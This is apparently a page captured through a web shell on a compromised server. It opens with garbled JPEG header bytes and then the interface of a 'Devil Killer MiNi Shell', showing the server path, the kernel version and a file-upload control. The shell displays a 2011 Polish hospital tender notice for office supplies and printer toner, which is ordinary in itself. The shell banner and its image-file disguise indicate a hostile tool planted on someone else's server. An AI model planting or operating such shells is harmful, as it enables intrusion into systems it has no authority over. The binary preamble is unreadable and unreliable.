JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111028/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111028/357046-N-2011.html

<p class="kh_header"><b>Bochnia: Dostawa materiałów biurowych i eksploatacyjnych Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej.</b><br>
<b>Numer ogłoszenia: 357046 - 2011; data zamieszczenia: 28.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zawarcia umowy ramowej.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" , Ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 014 6153201, 6153233, 50979196, faks 014 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i eksploatacyjnych Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów biurowych i eksploatacyjnych Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej. 
Zamówienie podzielone zostało na 2 pakiety:
Pakiet nr 1 - materiały biurowe
Pakiet nr 2 - tusze i tonery do drukarek
Wykaz przedmiotu zamówienia z podanymi ilościami określono w załączniku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.12.51.10-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, 
o którym mowa w punkcie III.4.1) pkt 1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, 
o którym mowa w punkcie III.4.1) pkt 1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, 
o którym mowa w punkcie III.4.1) pkt 1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, 
o którym mowa w punkcie III.4.1) pkt 1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, 
o którym mowa w punkcie III.4.1) pkt 1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
2.	W przypadku gdy, Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe innych podmiotów - pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z określeniem zakresu udzielanych zasobów. 
3.	Pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o udzielenie zamówienia publicznego lub do reprezentowania w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy - w przypadku wykonawców wspólnie ubiegający się o udzielenie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności.
Zmianie może ulec nazwa produktu przy zachowaniu jego parametrów na poziomie takim samym lub wyższym, sposób konfekcjonowania, oraz cena jednostkowa, z zastrzeżeniem § 5 ust 4 i 5 umowy. Zmiana może nastąpić także w zakresie danych identyfikujących strony umowy, takich jak np. firma, adresu siedziby lub inne zapisy dotyczące wskazania stron.  Zmiany umowy w wyżej wymienionych okolicznościach tylko za zgodą Zamawiającego.
W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od daty powzięcia wiadomości o tych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ Szpital Powiatowy im. Bł. Marty Wieckiej w Bochni
ul.Krakowska 31
32-700 Bochnia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.11.2011 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Bochni przy ul. Krakowskiej 31 na Dzienniku podawczym pokój nr 11, Pawilon A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> materiały biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Blok do flipcharta gładki 65x100 cm (50 kartek)	szt.	2
Bloczek samoprzylepny 38mm x 51 mm - 100 kart.	szt.	532
Bloczek samoprzylepny 76mm x 76 mm - 100 kart.	szt.	490
Blok szkolny (notatnik wyrywany - kratka) A4 - 100 kart.	szt.	40
Blok szkolny (notatnik wyrywany - kratka) A5 - 100 kart.	szt.	80
cienokopis kulkowy, grubość linii pisma 0,3 mm typu Pilot, kolor do wyboru przy zamówieniu	szt.	20
Datownik samotuszujący, ustawianie ręczne, z miesiącami w języku polskim, wysokość czcionki 4 mm	szt	10
Deska z klipem A4 wyposażona w sprężysty mechanizm zaciskowy służący do podtrzynywania kartek papieru	szt	66
Długopis jednorazowy z koncówką 1,0 mm, przeźroczysta obudowa umożliwia kontrolę zuzycia tuszu, długośc linii pisania 2200 m, kolor do wyboru przy zamówieniu	szt	500
Druk karta drogowa 100 kart numerowana	blocz	35
Druk kwitariusz przychodowy - 100 kart.	szt.	122
Druk magazyn wyda - 100 kart.	szt.	120
Druk dowód wpłaty	szt.	5
Druk księga druków ścisłego zarachowania	 szt.	4
Dziennik korespondencyjny, twrada oprawa, A4, 192 kart	szt.	10
Dziurkacz posiadający plastikowe ramię i metalową podstawę, listwę formatową iwskaźnik środka strony, roztaw dziurek 80 mm, średnica otworu 5mm, dziurkuje do 20 kartek, gwarancja min. 3 lata	szt	5
etykiety do segragatorów szerokie 190x61mm samoprzylepne do użycia we wszystkich typach drukarek, białe w formacie A4 pakowane po 100 szt. 	op.	2
etykiety do segragatorów wąskie 190x38 mm samoprzylepne do użycia we wszystkich typach drukarek, białe w formacie A4 pakowane po 100 szt. 	op.	2
Foliopis napełniony niezmywalnym i szybkoschnącym atramentem, piszącym lekko i płynie na praktycznie każdych powierzchniach: foliach, szkle, porcelanie, płytach CD/DVD, grubość lini 1,0mm	szt	511
grafity do wszystkich rodzajów ołówków automatycznych, grubość 0,5 mm, twardość HB	op.	30
Grzbiet plastikowy do bindownicy kolorowe, średnica 10 mm /na70 kartek/, op. 100 szt.	op	1
Grzbiet plastikowy do bindownicy kolorowe, kolorowe, średnica 16 mm /na 150 kartek/, op. 100 szt.	op	1
Grzbiet plastikowy do bindownicy kolorowe, kolorowe, średnica 19 mm /na 150 kartek/, op. 100 szt.	op	1
Grzbiet plastikowy do bindownicy kolorowe, kolorowe, średnica 25 mm /na 150 kartek/, op. 100 szt.	op	3
Grzbiet plastikowy do bindownicy kolorowe, średnica 32 mm /na 300 kartek/, op. 100 szt.	op	1
Grzbiet zaciskowy, do 30 kartek, posiadjący listę z perforacją umożliwiającą wpięcie oprawionych dokumentów do segregatora, przezroczyste	szt	100
Grzbiet zaciskowy, do 60 kartek, posiadjący listę z perforacją umożliwiającą wpięcie oprawionych dokumentów do segregatora, przezroczyste	szt	100
gumka do ścierania ołówka, nie niszcząca ścieranej powierzchni	szt	20
Identyfikator z przeźroczystego, sztucznego tworzywa, wyposażony w klips sprężynujący i niewielką agrafkę, format 57x90mm 	szt	185
Kalendarz biurkowy   na rok 2012 układ pionowy, wymiary: 13 x 20 cm, - jeden tydzień na każdej stronie, w prawym dolnym rogu skrócony kalendarzyk miesiąca, na początku kalendarza skrót roku,     wszystkie     kartki     połączone     spiralką    z możliwością wygodnego przekładania stron, podstawka o profilu trójkątnym zapewniająca stabilność	szt	50
Kalendarz na rok 2012 Format    A5,    w    twardej    oprawie    z    tworzywa skóropodobnego,   jeden   dzień   na   jednej    stronie z notatnikiem alfabetyczno  -adresowy;	szt	20
Kalendarz na rok 2012 Format    A4,    w    twardej    oprawie    z    tworzywa skóropodobnego,   jeden   dzień   na   jednej    stronie z notatnikiem alfabetyczno  -adresowy;	szt	3
Kalka maszynowa czarna do kopiowania, arkusze wielokrotnego użytku, gramatura warstwy kopiującej: 10g/m2, ilość arkuszy w jednostce 100 szt.	op	10
Klej w płynie wyposażony w metalową kulkę do nanoszenia kleju, nie zawiera rozpuszczalników, usuwany za pomoca wody poj. 50 ml	szt.	4
Klej w sztywcie bezbarwny i bezwonny, nietoksyczny idealny do klejenia papieru, poj. 20-22 g.		60
Klipsy do papieru 25 mm  odporne na odkształcenie, op. 12 szt.	op	8
Klipsy do papieru 32 mm  odporne na odkształcenie, op. 12 szt.	op	18
Klipsydo papieru 51 mm  odporne na odkształcenie, op. 12 szt.	op	6
Koperta biała B-5  HK 175x250 mm /samoprzylepna/ op. 500 szt. 	op.	5
Koperta biała C-4 HK 229x324 mm /samoprzylepna/ op. 250 szt.	op.	14
Koperta biała C-6 SK 114x162 mm /samoprzylepna/ op. 1000 szt./ 	op.	23
Koperta CD bezokienkowa	szt.	3600
Koperta ochronne z warstwa folii bąbelkowej wewnatrz samoprzylepne 235-240 x 340 mm	szt.	5
Koperta szara / brązowa  C-4 HK 229x324 mm /samoprzylepna/ op. 250 szt.	op.	1
Koperta szara / brązowa B-5  HK 175x250 mm /samoprzylepna/ op. 500 szt. 	op.	110
Koperta z rozszerzonym bokiem i spodem C-4 229-230x324x38-40 mm, brązowa, samoprzylepna	szt.	50
Korektor w piórze, szybkoschnący, nie gęstniejący i nie wysychający pojemność 10 ml.	szt	2
Korektor w płynie - z pędzelkiem, ekologiczny, idealnie     kryjący, szybkoschnący, pojemność 20 ml	szt	24
Koszulka foliowa A4 - op. 100 szt. kieszeń groszkowa,    transparentna matowa, otwarta na górze, wzmocniony dziurkowany brzeg pozwalający na wpięcie do każdego segregatora, 	szt	510
Koszulka foliowa A4 poszerzona - możliwość przechowywania większej ilości dokumentów (np. grubszych katalogów),harmonikjowy brzeg koszulki, przeźroczysta matowa, wzmocniony dziurkowany brzeg pozwalający na wpięcie do segragatora, otwrata od góry	szt	10
Koszulka foliowa A3 - op. 100 szt. kieszeń groszkowa, transparentna matowa, otwarta na górze, wzmocniony dziurkowany brzeg pozwalający wpięcie do każdego segregatora, perforacja wg dłuższego brzegu	szt	10
Koszulka foliowa A4  z boczną klapka, przeźroczysta matowa, wzmocniony dziurkowany brzeg pozwalający na wpięcie do segragatora,  - op. 10 szt.	szt	100
Koszulka foliowa A5 - op. 100 szt. kieszeń groszkowa,    transparentna matowa, otwarta na górze, wzmocniony dziurkowany brzeg pozwalający na wpięcie do każdego segregatora, 	op	15
Marker nietoksyczny, wodoodporny, końcówka okrągła, grubość końcówki 1,5-3mm, kolor czarny	szt	699
Nożyczki biurowe 21-22 mm do  cięcia papieru,  sznurka,  materiałów tekstylnych, ostrze ze stali nierdzewnej, uchwyt z niełamliwego tworzywa, wyprofilowana rękojeść	szt	10
Ofertówka sztwna, otwierana od góry i prawej strony, format A4	szt	1825
Okładki do bindowania, format A4, przezroczysta, bezbarwna, z PCV, op. 100 szt.	op	5
Ołówek automatyczny z gumką 0,5 mm z uchwytem gumowym, metalowy typu PENTEL lub równoważny	szt.	20
Okładki do bindowania, format A4, kartonowe o gramaturze 250g/m2; różne kolory, op. 100 szt.	op.	5
Papier do drukarki termicznej 57mm	szt	20
Papier do faxu 210x30 (6 szt/op)	op.	4
Papier do faxu 216x30 (6 szt/op)	op.	12
Papier komputerowy z perforacją, do drukarek igłowych,  240 x 12 - oryginał + 2 kopie (bez nadruku)	op.	14
Papier komputerowy z perforacją, do drukarek igłowych, 240 x 12 - oryginał + kopia (bez nadruku)	op.	5
Papier komputerowy z perforacją, do drukarek igłowych, 240 x 12 - oryginał (bez nadruku)	op.	6
Papier ksero A4 - ryza 500 szt, gramatura 80g/m2, białość(CIE)160(+/- 3), gładkość 180 cm3/min. (?50); typu Pol Lux	ryza	2000
Papier  A4 - ryza 500 szt, gramatura 200g/m2, białość(CIE)160(+/- 3), gładkość 180 cm3/min. (?50); 	ryza	12
Papier ksero A3-ryza 500 szt, gramatura 80g/m2, wilgotość 3,8-5%, białość (CIE)161(+/-2), nieprzeżroczystość 94%+2/-1, gładkosć 180 cm 3/min.(+/-50), typu Pol lux 		12
Papier ksero A4 mix kolor (kolory pastelowe) ryza 500 szt, gramatura 80g/m2, gładkość 180 cm3/min. (?50), typu Pol  lux	ryza	2
Pinezki do tablic korkowych, posiadają plastikowe uchwyty w różnych kolorach, op. 50 szt.	op	8
Pióro żelowe z przezroczystą obudową, pozwalającą kontrolować poziom tuszu, napełnione nieblaknącym i wodoodpornym tuszem. Wymienny wkład, grubość lini pisma: 0,6 mm	szt	180
Płyty CD-R 700 MB  ( pakowane po min. 50 szt.)	szt	800
Płyty DVD-R  (pakowane po min. 50 szt.)	szt	1000
Płyty CD-R PRINTABLE (zastosowanie do rejestru badań wykonywanywanych na Tomografie Komputerowym, w przypadku sklejania się płyt w opakowaniu dostawca zobowiązany jest do wymiany całego opakowania)	szt	3600
Płyty DVD-R PRINTABLE (zastosowanie do rejestru badań wykonywanywanych na Tomografie Komputerowym, w przypadku sklejania się płyt w opakowaniu dostawca zobowiązany jest do wymiany całego opakowania) (pakowane min. Po 50 szt.)	szt.	3600
półki na dokumenty formatu A4, przeźroczyste, platikowe, z mozliwością ustawiania jedna na drugiej pionowa lub pod skosem	szt	20
Pudełko archiwizujące format A4 na segregator szerokość grzbietu 90mm wysokość 300mm długość 356mm	szt.	180
rolki kasowe typu RK 05730 T, papier bezpyłowy, bezdrzewny, bezchlorowy; szerokość roki 57 mm, dł. 30 m	szt.	60
Rolka kasowa 57 mm /dalton/ op. 10 szt.	op.	4
Rozszywacz	szt	9
Segregator A4/ z wymienną etykietą, na dolnych krawędziach metalowe okucia, oklejony zewnatrz poliolefiną, a wewnątrz papierem, dźwignia wysokiej jakości z dociskaczem,   wzmocniony   otwór   na   palec, dwa otwory na przedniej okładce,  szerokość grzbietu 50 mm	szt	180
Segregator A4/ z wymienną etykietą, na dolnych krawędziach metalowe okucia, oklejony zewnatrz poliolefiną, a wewnątrz papierem, dźwignia wysokiej jakości z dociskaczem,   wzmocniony   otwór   na   palec, dwa otwory na przedniej okładce,  szerokość grzbietu 75 mm	szt	520
Segregator A5/ z wymienną etykietą, na dolnych krawędziach metalowe okucia, oklejony zewnatrz poliolefiną, a wewnątrz papierem, dźwignia wysokiej jakości z dociskaczem,   wzmocniony   otwór   na   palec, dwa otwory na przedniej okładce,  szerokość grzbietu 35 mm	szt	85
Skoroszyt A4 z PCV 20 szt/op, wpinany do segregatora, dziurkowanie pozwala na wpinanie do każdego segregatora, poj. ok. 20 kartek	op	183
Spinacze biurowe R33 /średnie/ okrągłe, niklowane pakowane po 100 szt	szt	160
Spinacze biurowe R50 /duże/ okrągłe,niklowane pakowane po            100 szt	szt	30
Tablica korkowa w drewnianej ramie, w komplecie elementy mocujące, wym. 90 x 120 cm	szt	1
Taśma do metkownicy Biltz dwurzędowa kolorowa	szt	90
